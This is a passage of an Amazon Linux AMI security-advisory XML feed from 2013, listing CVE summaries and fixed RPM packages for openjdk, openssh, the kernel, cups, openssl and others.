arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-163</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-163: important priority package update for java-1.6.0-openjdk</title><issued date="2013-03-02 16:50:00" /><updated date="2014-09-15 22:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1486:
An improper permission check issue was discovered in the JMX component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2013-0169:
It was discovered that OpenJDK leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1486" title="" id="CVE-2013-1486" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0273.html" title="" id="RHSA-2013:0273" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" 
version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-164</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-164: medium priority package update for axis</title><issued date="2013-03-02 16:50:00" /><updated date="2014-09-15 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5784:
Apache Axis did not verify that the server hostname matched the domain name in the subject's Common Name (CN) or subjectAltName field in X.509 certificates. This could allow a man-in-the-middle attacker to spoof an SSL server if they had a certificate that was valid for any domain name.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5784" title="" id="CVE-2012-5784" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0269.html" title="" id="RHSA-2013:0269" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="axis-manual" version="1.2.1" release="7.3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-manual-1.2.1-7.3.11.amzn1.noarch.rpm</filename></package><package name="axis" version="1.2.1" release="7.3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-1.2.1-7.3.11.amzn1.noarch.rpm</filename></package><package name="axis-javadoc" version="1.2.1" release="7.3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-javadoc-1.2.1-7.3.11.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-165</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-165: medium priority package update for openssh</title><issued date="2013-03-02 16:51:00" /><updated date="2014-09-15 22:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5536:
Due to the way the pam_ssh_agent_auth PAM module was built in Red Hat Enterprise Linux 6, glibc's error() function was called rather than the intended error() function in pam_ssh_agent_auth to report errors. As these two functions expect different arguments, it was possible for an attacker to cause an application using pam_ssh_agent_auth to crash, disclose portions of its memory or, potentially, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5536" title="" id="CVE-2012-5536" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0519.html" title="" id="RHSA-2013:0519" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-clients" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-84.20.amzn1.i686.rpm</filename></package><package name="openssh-server" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="5.3p1" release="84.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/openssh-clients-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="openssh" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-5.3p1-84.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-166</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-166: medium priority package update for kernel</title><issued date="2013-03-02 16:54:00" /><updated date="2014-09-15 22:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0871:
* A race condition was found in the way the Linux kernel's ptrace implementation handled PTRACE_SETREGS requests when the debuggee was woken due to a SIGKILL signal instead of being stopped. A local, unprivileged user could use this flaw to escalate their privileges.
CVE-2012-4530:
868285:
CVE-2012-4530 kernel: stack disclosure in binfmt_script load_script()
* A memory disclosure flaw was found in the way the load_script() function in the binfmt_script binary format handler handled excessive recursions. A local, unprivileged user could use this flaw to leak kernel stack memory to user-space by executing specially-crafted scripts.
CVE-2012-4461:
* A flaw was found in the way the KVM (Kernel-based Virtual Machine) subsystem handled guests attempting to run with the X86_CR4_OSXSAVE CPU feature flag set. On hosts without the XSAVE CPU feature, a local, unprivileged user could use this flaw to crash the host system. (The "grep --color xsave /proc/cpuinfo" command can be used to verify if your system has the XSAVE CPU feature.)
CVE-2012-4398:
* It was found that a deadlock could occur in the Out of Memory (OOM) killer. A process could trigger this deadlock by consuming a large amount of memory, and then causing request_module() to be called. A local, unprivileged user could use this flaw to cause a denial of service (excessive memory consumption).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4398" title="" id="CVE-2012-4398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4461" title="" id="CVE-2012-4461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4530" title="" id="CVE-2012-4530" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0871" title="" id="CVE-2013-0871" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0223.html" title="" id="RHSA-2013:0223" type="redhat" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0567.html" title="" id="RHSA-2013:0567" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.39" release="6.88.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.2.39" release="6.88.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.39-6.88.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-167</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-167: important priority package update for java-1.6.0-openjdk</title><issued date="2013-03-14 22:03:00" /><updated date="2014-09-15 22:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1493:
It was discovered that the 2D component did not properly reject certain malformed images. Specially-crafted raster parameters could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
CVE-2013-0809:
An integer overflow flaw was found in the way the 2D component handled certain sample model instances. A specially-crafted sample model instance could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0809" title="" id="CVE-2013-0809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493" title="" id="CVE-2013-1493" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0605.html" title="" id="RHSA-2013:0605" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" 
version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-168</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-168: important priority package update for java-1.7.0-openjdk</title><issued date="2013-03-14 22:03:00" /><updated date="2014-09-15 22:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1493:
It was discovered that the 2D component did not properly reject certain malformed images. Specially-crafted raster parameters could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
CVE-2013-0809:
An integer overflow flaw was found in the way the 2D component handled certain sample model instances. A specially-crafted sample model instance could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0809" title="" id="CVE-2013-0809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493" title="" id="CVE-2013-1493" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0602.html" title="" id="RHSA-2013:0602" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.8.0.22.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" 
release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-169</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-169: medium priority package update for jakarta-commons-httpclient</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5783:
The Jakarta Commons HttpClient component did not verify that the server hostname matched the domain name in the subject's Common Name (CN) or subjectAltName field in X.509 certificates. This could allow a man-in-the-middle attacker to spoof an SSL server if they had a certificate that was valid for any domain name.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783" title="" id="CVE-2012-5783" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0270.html" title="" id="RHSA-2013:0270" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jakarta-commons-httpclient-javadoc" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-javadoc-3.1-12.6.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-3.1-12.6.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-manual" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-manual-3.1-12.6.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-demo" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-demo-3.1-12.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-170</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-170: medium priority package update for cups</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5519:
It was discovered that CUPS administrative users (members of the SystemGroups groups) who are permitted to perform CUPS configuration changes via the CUPS web interface could manipulate the CUPS configuration to gain unintended privileges. Such users could read or write arbitrary files with the privileges of the CUPS daemon, possibly allowing them to run arbitrary code with root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5519" title="" id="CVE-2012-5519" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0580.html" title="" id="RHSA-2013:0580" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="50.18.amzn1" epoch="1" 
arch="i686"><filename>Packages/cups-lpd-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-50.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-171</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-171: medium priority package update for openssl</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0169:
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
CVE-2013-0166:
A NULL pointer dereference flaw was found in the OCSP response verification in OpenSSL. A malicious OCSP server could use this flaw to crash applications performing OCSP verification by sending a specially-crafted response.
CVE-2012-4929:
It was discovered that the TLS/SSL protocol could leak information about plain text when optional compression was used. An attacker able to control part of the plain text sent over an encrypted TLS/SSL connection could possibly use this flaw to recover other portions of the plain text.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4929" title="" id="CVE-2012-4929" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0166" title="" id="CVE-2013-0166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0587.html" title="" id="RHSA-2013:0587" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package 